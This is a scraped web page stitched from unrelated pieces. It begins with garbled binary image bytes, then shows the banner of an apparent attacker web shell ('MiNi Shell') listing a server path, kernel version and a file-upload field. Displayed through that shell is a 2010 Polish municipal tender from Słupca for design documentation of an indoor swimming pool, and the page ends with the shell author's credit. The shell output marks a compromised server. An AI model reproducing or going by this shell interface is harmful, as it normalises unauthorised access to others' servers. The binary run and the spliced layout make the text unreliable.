JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100413/102592-N-2010.html

<p class="kh_header"><b>Słupca: Opracowanie dokumentacji projektowej  krytej pływalni w   Słupcy</b><br>
<b>Numer ogłoszenia: 102592 - 2010; data zamieszczenia: 13.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta w Słupcy , ul. Pułaskiego 21, 62-400 Słupca, woj. wielkopolskie, tel. 063 277 27 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.slupca.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej  krytej pływalni w   Słupcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompletnego projektu budowlanego krytej pływalni o charakterze rekreacyjno-sportowym z pełną infrastrukturą techniczną towarzyszącą dla tego obiektu w zakresie niezbędnym do uzyskania pozwolenia na budowę. Lokalizacja obiektu: Słupca, ul. S.Batorego, działka nr 2625/3, własność Gminy Miejskiej Słupca.
Przewidywane parametry określające wielkość obiektu  (+-5% )
- pow. zabudowy: ca 1000,00 m2,
- pow. użytkowa:  ca 2200,00 m2,
- kubatura brutto: ca12000,00 m3,
                                
1.1.W ramach zamówienia należy wykonać:
- Proj. budowlany architektoniczny,
- Proj. budowlany konstrukcyjny,
- Proj. budowlany instalacji wod. - kan., 
- Proj. budowlany instalacji c. o.,
- Proj. budowlany instalacji elektrycznej i odgromowej,
- Proj. budowlany instalacji p-poż., 
- Proj. budowlany instalacji alarmowej,
- Proj. budowlany instalacji strukturalnej (komp. + telef.),
- Proj. budowlany systemu elektronicznej obsługi klienta 
- Proj. budowlany wymiennikowni ciepła wraz z wspomagającą instalacją 
  solarną 
- Proj. budowlany wentylacji z uwzględnieniem rekuperacji
- Proj. budowlany przyłączy wod.-kan., 
- Proj. budowlany przyłącza ciepłowniczego, 
- Proj. budowlany przyłącza telefonicznego, energetycznego,
- Proj. budowlany oświetlenia zewnętrznego, 
- Proj. budowlany dróg dojazdowych, parkingów i chodników, 
- Proj. budowlany zieleni, 
- Proj. budowlany technologii uzdatniania wody, 
- Plan zagospodarowania terenu,
-Zestawienie wyposażenia sportowo-rekreacyjnego oraz urządzeń do 
  konserwacji pływalni i jej systemów, 
- Wykonanie projektów przebudowy istniejących sieci w wypadku kolizji z
  projektowanym obiektem pływalni, 
- Charakterystykę energetyczną obiektu,
1.2. Zakres zadania obejmuje również:
- uzyskanie wszelkich uzgodnień niezbędnych do wykonania projektu, 
- wykonanie map do celów projektowych, 
- wykonanie badań geotechnicznych gruntów,
- uzyskanie warunków przyłączeniowych od Zakładu Energetycznego w Słupcy, - uzyskanie warunków przyłączeniowych od MZWiK w Słupcy, 
- pełnienie nadzoru autorskiego nad realizacją w/w inwestycji; cena zawiera 10 pobytów projektanta na budowie w okresie 5 lat od przekazania dokumentacji projektowej, 
- wykonanie kosztorysu inwestorskiego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego wraz z branżowymi przedmiarami robót,  
- uzyskanie decyzji o pozwoleniu na budowę dla w/w inwestycji.
1.3.Wykonawca zobowiązany jest dokonać właściwej aktualizacji i dopracowania załączonych do SIWZ szczegółowych specyfikacji technicznych wykonania i odbioru robót stanowiących zał.nr 6 do SIWZ oraz przedstawienie w nich zakresu robót obejmujących przedmiot zamówienia, zgodnie z wymogami rozporządzenia Ministra Infrastruktury z dnia 02 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego ( Dz.U. z 2004r., nr 202, poz. 2072 z póź. zm. ).
1.4. Dokumentacja musi uwzględniać docelowo montaż (solarów) kolektorów płaskich 200-F ( lub równoważnych), z zasobnikami wraz konstrukcjami i armaturą zwanymi dalej łącznie jako całość w/w zakresu solarami.

1.5. Koncepcja architektoniczna wraz z programem funkcjonalno-użytkowym, wykonana przez Towarzystwo Konsultantów Polskich Cracovia Konsultants Sp.z o.o. z Krakowa w grudniu 2009r jest pomocniczym uzupełnieniem opisu przedmiotu zamówienia, stanowi załącznik  nr 7 do   niniejszej   SIWZ jako materiał pomocniczy a nie obowiązujący. Zamawiający dopuszcza możliwość modyfikacji przyjętych w programie funkcjonalno-użytkowym rozwiązań i parametrów wynikających z uszczegółowienia dokumentacji budowlanej. Wprowadzenie ewentualnych zmian powinno służyć poprawie walorów użytkowych i eksploatacyjnych a przede wszystkim pomniejszeniu kosztów realizacji inwestycji. Zmiany takie mogą zostać wprowadzone w uzgodnieniu z Zamawiającym. 
1.6. Obiekt należy zaprojektować w sposób zapewniający możliwie minimalny poziom zużycia energii w czasie użytkowania obiektu.
1.7. Projektant zobowiązany jest uzgodnić z Zamawiającym, na etapie sporządzania dokumentacji, rozwiązania projektowe i materiałowe w świetle załączonych szczegółowych specyfikacji technicznych wykonania i odbioru robót.

1.8. Projektant wszelkie dodatkowe opracowania niezbędne do uzyskania wymaganych opinii i uzgodnień uzyska własnym staraniem i na swój koszt ( zostanie udzielone pełnomocnictwo do występowania w imieniu inwestora).

1.9. Zamawiający wymaga, aby Wykonawca przeniósł na Zamawiającego przysługujące mu majątkowe prawa autorskie wraz z własnością wszystkich egzemplarzy dokumentacji objętych przedmiotem zamówienia oraz ich wersji elektronicznych, na zasadach określonych we wzorze umowy.

1.10. Wykonawca będzie zobowiązany do pełnienia nadzoru autorskiego nad wykonywanymi na podstawie opracowanego projektu robotami w tym : przybycia na budowę na każde żądanie Zamawiającego, stwierdzenie w toku realizacji zgodności z projektem, uzgadnianie możliwości wprowadzenia ewentualnych rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego.

1.11. Wykonawca zobowiązany jest sporządzić dokumentację projektową w następujących ilościach:
       Cały projekt budowlany (wszystkie branże)- 5 egzemplarzy w wersji papierowej + jeden w wersji elektronicznej w formacie PDF na płycie CD,
1)	projekt zagospodarowania działki wraz z projektem dróg wewnętrznych i parkingów, odprowadzenia wód deszczowych i oświetlenia zewnętrznego - po 5 egzemplarzy w wersji papierowej + jeden w wersji elektronicznej w formacie PDF na płycie CD,
2)	specyfikacje techniczne wykonania i odbioru robót - po 2 egzemplarze w wersji papierowej + jeden w wersji elektronicznej w formacie PDF na płycie CD,
3)	przedmiary robót - po 2 egzemplarze /wersja papierowa/+ jeden w wersji elektronicznej w formacie PDF na płycie CD,
4)	kosztorys inwestorski - po 1 egzemplarzu w wersji papierowej oraz jeden w formacie ATH, (aktualizacja na żądanie zamawiającego w ciągu 3 lat od  daty przekazania dokumentacji Zamawiającemu).
5)	zbiorcze zestawienie kosztów - 1 egzemplarz+ wersja elektroniczna na płycie CD,

2. Dokumentację należy opracować dla pływalni o następującym ramowym programie funkcjonalno-użytkowym: 

2.1. Basen sportowy   25 m x 12,5 m  o głębokości 1,35  do  1,8 m   spełniający 
       wymagania przepisów Polskiego Związku Pływackiego.

2.2. Basen  rekreacyjny  o  głębokości   od 0,8 m do 1,2 m  z  torem  do  nauki 
       pływania. 

2.3. Brodzik dla dzieci o powierzchni ok. 30 - 40 m2 i głębokości od 10 do 60 cm
      (może być łączony z basenem rekreacyjnym). 

2.4. Atrakcje wodne: zjeżdżalnie duża oraz dla dzieci, kurtyny wodne, leżanki z 
       masażem poziomym, bicze wodne. 

2.5. Jakuzzi 2 szt. 

2.6.. Galeria widokowa z miejscami dla widowni ( do 40 miejsc). 

2.7. Pomieszczenia odnowy biologicznej - siłownia, fitness, sauny parowa i sucha, 

2.8. Pomieszczenia szatniowo-sanitarne wraz niezbędnym zapleczem. 

2.9. Pomieszczenia administracyjne 

2.10. Gastronomia - sala konsumpcyjna z zapleczem 

2.11. Niezbędne pomieszczenia techniczne. 

2.12. Łącznik z obiektem hali sportowej MOSiR w Słupcy  
            
2.13. Usługi towarzyszące:kręgielnia - min.2 tory, sala gry w squash z kortem
        10.38x7,62

2.14.  Ponadto w zakres programowy inwestycji wchodzi zaprojektowanie parkingu z wydzielonymi miejscami dla autokarów i samochodów osobowych o ilości miejsc postojowych odpowiedniej dla projektowanego obiektu oraz otaczającej zieleni i małej architektury.

UWAGA: podstawowymi urządzeniami w obiekcie będą baseny, zjeżdżalnia wodna oraz jacuzzi. Strefa usług towarzyszących tj. sauny, gastronomia, siłownia,kręgielnia, sale gry w squasha - będą użytkowane w systemie komercyjnym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.20.00-6, 71.32.00.00-7, 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy wymaga wniesienia wadium w kwocie 6.000,-zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten  zostanie spełniony, jeśli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, opracował  co najmniej  2  zakończone i wdrożone do realizacji dokumentacje projektowe obiektu budowlanego ( kubaturowego) - dotyczące krytej pływalni o powierzchni użytkowej co najmniej 2.200,00 m2 oraz ,że zostały one wykonane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował projektantami posiadającymi uprawnienia bez  ograniczeń w osobach: 

a) głównego projektanta - architekta o wykształceniu wyższym technicznym, z uprawnieniami do projektowania bez ograniczeń w specjalności architektonicznej (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 1 pkt. 1 z uwzględnieniem art. 104 ustawy z dnia 07 lipca 1994r. - Prawo budowlane ( tj. z 2006r., Dz. U. nr 156, poz. 1118, z póź. zm.),posiadającego doświadczenie w opracowaniu co najmniej 2 zakończonych i wdrożonych do realizacji projektów architektonicznych krytych pływalni o powierzchni użytkowej co najmniej 2200 m2 każda

b) projektanta w specjalności konstrukcyjnej z wykształceniem wyższym technicznym, z uprawnieniami do projektowania bez ograniczeń w specjalności konstrukcji budowlanych ( lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 1 pkt. 1 z uwzględnieniem art. 104 ustawy z dnia 07 lipca 1994r. - Prawo budowlane ( tj. z 2006r., Dz. U. nr 156, poz. 1118, z póź. zm.),posiadającego doświadczenie w opracowaniu co najmniej 1 zakończonej i wdrożonej do realizacji dokumentacji projektowej obiektu budowlanego (kubaturowego) dotyczącego krytej pływalni o pow.użytk. co najmniej 2200 m2
 
c) projektanta w specjalności sanitarnej z wyższym wykształceniem technicznym z uprawnieniami do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych ( lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 1 pkt. 1 z uwzględnieniem art. 104 ustawy z dnia 07 lipca 1994r. - Prawo budowlane ( tj. z 2006r., Dz. U. nr 156, poz. 1118, z póź. zm.),posiadającego doświadczenie w opracowaniu co najmniej 1 zakończonej i wdrożonej do realizacji dokumentacji projektowej dla robót sanitarnych w ramach budowy obiektu budowlanego ( kubaturowego) - dotyczącego krytej pływalni o powierzchni użytkowej co najmniej2.200,00m2,

d) projektanta w specjalności elektrycznej z wyższym wykształceniem technicznym z uprawnieniami z branży instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych ( lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 1 pkt. 1 z uwzględnieniem art. 104 ustawy z dnia 07 lipca 1994r. - Prawo budowlane ( tj. z 2006r., Dz. U. nr 156, poz. 1118, z póź. zm.). posiadającego doświadczenie w opracowaniu co najmniej 1 zakończonej i wdrożonej do realizacji dokumentacji projektowej dla robót elektrycznych w ramach budowy obiektu budowlanego ( kubaturowego) - dotyczącego krytej pływalni o powierzchni użytkowej co najmniej 2.200,00 m2,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności obejmującej przedmiot zamówienia na kwotę co najmniej 200tys.zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-oryginał lub kopia poświadczona notarialnie pełnomocnictwa do składania oświadczeń w imieniu wykonawcy,w przypadku ustanowienia pełnomocnika
-wykaz części zamówienia , które wykonawca zamierza powierzyć podwykonawco z określeniem zakresu,rodzaju  i ilości robót
-oryginał dokumentu wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.slupca pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać w siedzibie Zamawiającego :Słupca ,ul.Pułaskiego 21 pok.320 ,lub pobrać ze strony internetowej www.bip.slupca.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2010 godzina 08:30, miejsce: w siedzibie Zamawiającego Słupca , ul.Pułaskiego 21,pok.205-sekretariat urzędu (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com